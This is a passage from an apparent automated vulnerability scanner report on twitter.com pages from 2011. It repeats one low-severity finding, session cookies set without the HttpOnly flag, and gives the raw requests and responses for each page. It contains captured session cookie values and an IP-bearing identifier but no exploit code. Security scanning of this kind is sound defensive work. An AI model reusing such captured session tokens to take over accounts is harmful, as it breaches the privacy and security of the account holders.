Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224917-75373-44870
ETag: "7b489ae25bea2d0595afca259835fae7"
Last-Modified: Fri, 28 Jan 2011 14:28:37 GMT
X-Runtime: 0.04662
Content-Type: text/html; charset=utf-8
Content-Length: 13965
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwMzkwNzc1MDk5NDI0NzcwOgxjc3JmX2lkIiViNWFh%250AMzYyYjVlN2NkY2M5MjE1YzdhZjdkNjRhMzgwMjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--f1b68fb54f1b85d8151c7dd784fd1db4f27f519c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.38. http://twitter.com/Michael_Joseph/status/30750905452204032

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Michael_Joseph/status/30750905452204032

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Michael_Joseph/status/30750905452204032 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224914-94525-23113
ETag: "83bfba4b5292333b01c60b5cd56ed6f4"
Last-Modified: Fri, 28 Jan 2011 14:28:34 GMT
X-Runtime: 0.04125
Content-Type: text/html; charset=utf-8
Content-Length: 13962
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzUwOTA1NDUyMjA0MDMyOgxjc3JmX2lkIiU2NGIz%250AM2Q5ODM3OTJkMzdhM2NmN2MyMTM0MTQwMWI1YjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--541977a9c3c5e1a5a3320c2e55e9133173473f96; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.39. http://twitter.com/Michael_Joseph/status/30790097846673409

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Michael_Joseph/status/30790097846673409

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Michael_Joseph/status/30790097846673409 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224913-82080-4832
ETag: "f4090043902b6e990964220437113fcc"
Last-Modified: Fri, 28 Jan 2011 14:28:33 GMT
X-Runtime: 0.05956
Content-Type: text/html; charset=utf-8
Content-Length: 14049
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzkwMDk3ODQ2NjczNDA5Ogxjc3JmX2lkIiU0ZTYz%250AMTFjMGI1MGExOTQ1ZDU1ZTJiMzY3YmViYjhmZDoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--3f3d222c37991f7c56cd273e7db3127271465e45; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.40. http://twitter.com/MittRomney

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /MittRomney

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MittRomney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-38547-52668
ETag: "3107c6cc6c6978ff3b7722cbf52c2af6"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00731
Content-Type: text/html; charset=utf-8
Content-Length: 46527
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.41. http://twitter.com/NewYorkPost

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /NewYorkPost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NewYorkPost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265993-27588-50087
ETag: "e773df2d3a6b90bf31143c56a9f20c5d"
Last-Modified: Sat, 29 Jan 2011 01:53:13 GMT
X-Runtime: 0.01729
Content-Type: text/html; charset=utf-8
Content-Length: 53629
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.42. http://twitter.com/Nicole_114

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Nicole_114

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Nicole_114 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-31870-20101
ETag: "259b5389cc01f15bd18d06cca5332bd4"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01243
Content-Type: text/html; charset=utf-8
Content-Length: 47429
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.43. http://twitter.com/Oprah

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Oprah

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Oprah HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266030-46156-5686
ETag: "857c98a5094f6af87e0d30eae77b7c6f"
Last-Modified: Sat, 29 Jan 2011 01:53:50 GMT
X-Runtime: 0.01844
Content-Type: text/html; charset=utf-8
Content-Length: 42735
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.44. http://twitter.com/PageLines

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /PageLines

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PageLines HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:04 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225004-17515-51236
ETag: "24c45e2f38e6ae478c4805af9b36ff8e"
Last-Modified: Fri, 28 Jan 2011 14:30:04 GMT
X-Runtime: 0.01227
Content-Type: text/html; charset=utf-8
Content-Length: 51190
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.45. http://twitter.com/PageLines/status/27898822361354240

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /PageLines/status/27898822361354240

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PageLines/status/27898822361354240 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225006-58314-38201
ETag: "57ff1e9c73248c6fb8e8d467c82b1909"
Last-Modified: Fri, 28 Jan 2011 14:30:06 GMT
X-Runtime: 0.07512
Content-Type: text/html; charset=utf-8
Content-Length: 13712
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vUGFnZUxpbmVz%250AL3N0YXR1cy8yNzg5ODgyMjM2MTM1NDI0MDoMY3NyZl9pZCIlMzc4NTRjMzAw%250AODE3YjBiNmI1MTM5ZjdiNDE2M2E1ZmU6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--8f776230b304f1b0fa1fdaa92cad95b801a77055; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.46. http://twitter.com/PhantomGourmet

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /PhantomGourmet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PhantomGourmet HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266033-91577-32859
ETag: "161ed10fae22588b3ed41cf62918d8a5"
Last-Modified: Sat, 29 Jan 2011 01:53:53 GMT
X-Runtime: 0.00903
Content-Type: text/html; charset=utf-8
Content-Length: 47996
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.47. http://twitter.com/Prucenter

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Prucenter

Issue detail

